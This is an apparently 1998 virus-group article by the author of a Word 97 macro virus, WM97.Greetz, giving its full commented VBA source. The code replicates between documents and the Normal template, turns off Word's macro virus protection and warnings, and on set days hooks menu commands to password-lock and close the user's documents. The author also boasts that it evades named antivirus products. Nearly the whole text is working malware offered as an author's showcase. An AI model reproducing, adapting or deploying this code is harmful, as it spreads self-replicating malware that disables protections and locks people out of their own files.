Copy Link
Add to Bookmark
Report
SLAM4.043: WordMacro97.Greetz by KidChaos/SLAM
SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM
| |
S WordMacro97.Greetz S
L L
| By |
A A
M Kid Chaos [SLAM] M
| |
SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM
Name : WM97.Greetz
Dedicated to : all the Brotherz of SLAM ;)
Version : A
Language : Visual Basic for Applications - VBA
Author : Kid Chaos [SLAM]
Target : Word 97 documents/templates
Total macros : seven
VBA modules : three ;)
Stealth : Yes
Comment : This is a stealth macrovirus for Word 97.
It replicates itself on opening documents.
Unlike common word97 viruses which use just one VBA
module, WM97.Greetz use three VBA modules:
- SLAM
- KidChaos
- Greetz
Every module have two or three macros. Here's the list of
these macros:
- AutoOpen
- HelpAbout
- KC
- AutoExec
- FileTemplates
- ToolsMacro
- ViewVBcode
I've tested WM97.Greetz with the following antiviruses:
* Antiviral Profesional Toolkit 3.0 build 119
* F-Macro 3.0c (F-Prot utility) latest FSMACRO.DEF
* FindVirus 7.82 drivers 31 Mar 98
* Norman Thunderbyte 8.05
* VirusScan 3.16 datafile 3104
None of them were able to detect WM97.Greetz (april 98)!
Only full macro heuristic AVs, like F/WIN32 of Stefan
Kurtzhals or HMVS of Valky & Vrtik were able to detect
WM97.Greetz (only under heuristic search).
Of course several AVs are probably going to include
detection when they'll get this macrovirus :-)
The macrovirus has been fully commented in this article
(comments are not part of original VBA code).
Well, more VBA stuff is coming! O:-)
Attribute VB_Name = "SLAM"
Sub AutoOpen()
' WM97.Greetz dedicated to my brotherz of SLAM VIRUS TEAM!
' (c) April 1998, by Kid Chaos [SLAM]
On Error GoTo seeya ' Error handler
If (Rnd() < 0.4) Then ' Is random number < 0.4 ?
With Assistant.NewBalloon ' Use the current assistant
.BalloonType = msoBalloonTypeBullets
.Icon = msoIconTip ' Icon IDEA :)
.Button = msoButtonSetOkCancel ' Put Buttons: OK & Cancel
' Here the title
.Heading = "Word97.Greetz" & vbCrLf & "by Kid Chaos [SLAM]"
' Now greetz to my brotherz
' of SLAM ;)
.Labels(1).Text = " Greetings to SLAM friends:"
.Labels(2).Text = " Virtual Daemon" & vbCrLf & " Aurodreph" _
& vbCrLf & " CyberYoda" & vbCrLf & " Darx Kies" & vbCrLf & _
" Forms" & vbCrLf & " rAiD" & vbCrLf & " Shaitan" & vbCrLf & _
" Stealth Warrior" & vbCrLf & " Trigger" & vbCrLf & " Yesna"
.Show ' the magic word: Show
End With
End If
seeya:
Call KC ' launch KC routine
End Sub
Sub HelpAbout()
On Error GoTo Ha ' Error handler
If (Day(Now()) > 13) Then ' Day 13? }:-)
' Info about this macro and
' question to Bill Gate$ :)
MsgBox "====> (c) 1998 by Kid Chaos <====" & vbCrLf & _
"====> of SLAM Virus Team <====" & vbCrLf & vbCrLf & _
"Hey Bill Gates, do you like other cake" & vbCrLf & _
"on your face? :-D" _
, vbCritical, "About WM97.Greetz... :-)" ' Title and critical button
End If
Ha:
End Sub
Attribute VB_Name = "KidChaos"
Sub KC()
Dim Temp(3) As String ' array of three VBA modules
On Error GoTo Au ' error handle
Temp(1) = "KidChaos" ' module 1
Temp(2) = "SLAM" ' " 2
Temp(3) = "Greetz" ' " 3
With Application
ScreenUpdating = False ' Disable Updating
DisplayAlerts = wdAlertsNone ' Disable Alerts
End With
Options.VirusProtection = False ' Disable VirusProtection
' Declares...
Set ActiveDoc = ActiveDocument ' Current document
Set GlobalDoc = NormalTemplate ' template
' Assume Document and template
' are clean
DocInf = False
GloInf = False
' Count and check name macros of
' document for infection already
' using WordBasic ;)
For k = 1 To WordBasic.CountMacros(1)
If WordBasic.MacroName$(k, 1) = "SLAM" Then DocInf = 1
Next k
If DocInf = False Then ' document is clean, infect it!
' Copy from doc infected the
' three projects to current doc
For z = 1 To 3
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:=Temp(z), _
Object:=wdOrganizerObjectProjectItems
Next z
' Save the document infected as
' template
ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
End If
' Count and check name macros of
' template for infection already
For k = 1 To WordBasic.CountMacros(0)
If WordBasic.MacroName$(k, 0) = "Greetz" Then GloInf = 1
Next k
' If the project called Greetz is
' found then assume the template
' was infected
If GloInf = False Then ' template is clean..fuck it! ;-)
' Copy from current document the
' three modules to Template
For z = 1 To 3
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:=Temp(z), _
Object:=wdOrganizerObjectProjectItems
Next z
Options.SaveNormalPrompt = False ' Disables global template write
' access warnings
End If
Application.DisplayAlerts = wdAlertsAll ' Enable alerts
Au:
End Sub
Sub AutoExec()
'-----X-----S L A M R O Q S !!! -----X----- 'Yo broz! ;)
End Sub
Attribute VB_Name = "Greetz"
Sub FileTemplates()
On Error GoTo Ft ' error handler
If (Day(Now()) = 13) Then ' 13? }:-)
ActiveDocument.Password = "KidChaos" ' Put password
Documents.Close SaveChanges:=wdSaveChanges ' Save & close document
End If
Ft:
End Sub
Sub ToolsMacro()
On Error GoTo St ' error handler
If (Day(Now()) = 1) Then ' first day?
ActiveDocument.Password = "WeRoqs" ' Put password
Documents.Close SaveChanges:=wdSaveChanges ' Save & close document
End If
St:
End Sub
Sub ViewVBcode()
On Error GoTo Vv ' error handler
If (Day(Now()) = 20) Then ' day 20?
ActiveDocument.Password = "SLAM98" ' Put password
Documents.Close SaveChanges:=wdSaveChanges ' Save & close document
End If
Vv:
End Sub
